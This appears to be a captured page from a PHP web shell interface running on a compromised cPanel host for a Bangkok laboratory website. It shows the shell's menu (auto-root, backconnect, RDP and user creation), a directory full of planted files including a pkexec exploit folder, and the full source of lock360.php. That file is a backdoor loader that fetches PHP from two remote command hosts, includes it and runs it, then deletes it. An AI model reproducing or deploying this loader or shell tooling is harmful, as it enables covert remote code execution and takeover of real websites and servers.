Linux cpanel07wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.80.el6.x86_64 #1 SMP Thu Sep 24 01:42:00 EDT 2020 x86_64
Apache
: 163.44.198.52 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.0.9
cp657342
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home3 /
cp657342 /
public_html /
omicbangkok.shop /
storage /
app /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.tmb
[ DIR ]
drwxr-xr-x
ACCREDITATION Cert.
[ DIR ]
drwxr-xr-x
ALFA_DATA
[ DIR ]
drwxr-xr-x
Application To OMIC Laboratory
[ DIR ]
drwxr-xr-x
Brochure OMIC
[ DIR ]
drwxr-xr-x
CERTIFICATION LAB
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
Home
[ DIR ]
drwxr-xr-x
ISO1900
[ DIR ]
drwxr-xr-x
MAP
[ DIR ]
drwxr-xr-x
Map OMIC
[ DIR ]
drwxr-xr-x
QMS
[ DIR ]
drwxr-xr-x
about
[ DIR ]
drwxr-xr-x
banner
[ DIR ]
drwxr-xr-x
brands
[ DIR ]
drwxr-xr-x
download
[ DIR ]
drwxr-xr-x
galleries
[ DIR ]
drwxr-xr-x
master
[ DIR ]
drwxr-xr-x
news
[ DIR ]
drwxr-xr-x
orders
[ DIR ]
drwxr-xr-x
page
[ DIR ]
drwxr-xr-x
product
[ DIR ]
drwxr-xr-x
service
[ DIR ]
drwxr-xr-x
service_catgory
[ DIR ]
drwxr-xr-x
test
[ DIR ]
drwxr-xr-x
user
[ DIR ]
drwxr-xr-x
vendors
[ DIR ]
drwxr-xr-x
websetting
[ DIR ]
drwxr-xr-x
z
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
fxmLOL.php
12.56
KB
-rw-r--r--
lock360.php
1.4
KB
-rw-r--r--
re.php
82.59
KB
-r--r--r--
reps.php
806
B
-rw-r--r--
test.png
470.3
KB
-rw-r--r--
xv32opc.php
1.4
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : lock360.php
<?php function GC($a) { $url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', $a, $_REQUEST['api'], $_REQUEST['ac'], $_REQUEST['path'], $_REQUEST['t']); $code = @file_get_contents($url); if ($code == false) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'll'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 100); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $code = curl_exec($ch); curl_close($ch); } return $code; } if (isset($_REQUEST['ac']) && isset($_REQUEST['path']) && isset($_REQUEST['api']) && isset($_REQUEST['t'])) { $code = GC('https://c.zvo1.xyz/'); if (!$code) { $code = GC('https://c2.icw7.com/'); } $need = '<' . '?' . 'php'; if (strpos($code, $need) === false) { die('get failed'); } if(function_exists('tmpfile')){ $file_name = tmpfile(); } if($file_name) { fwrite($file_name, $code); $a = stream_get_meta_data($file_name); $file_path = $a['uri']; @include($file_path); fclose($file_name); }else { $file_path = '.c'; file_put_contents($file_path, $code); @include($file_path); } @unlink($file_path); die(); }
Close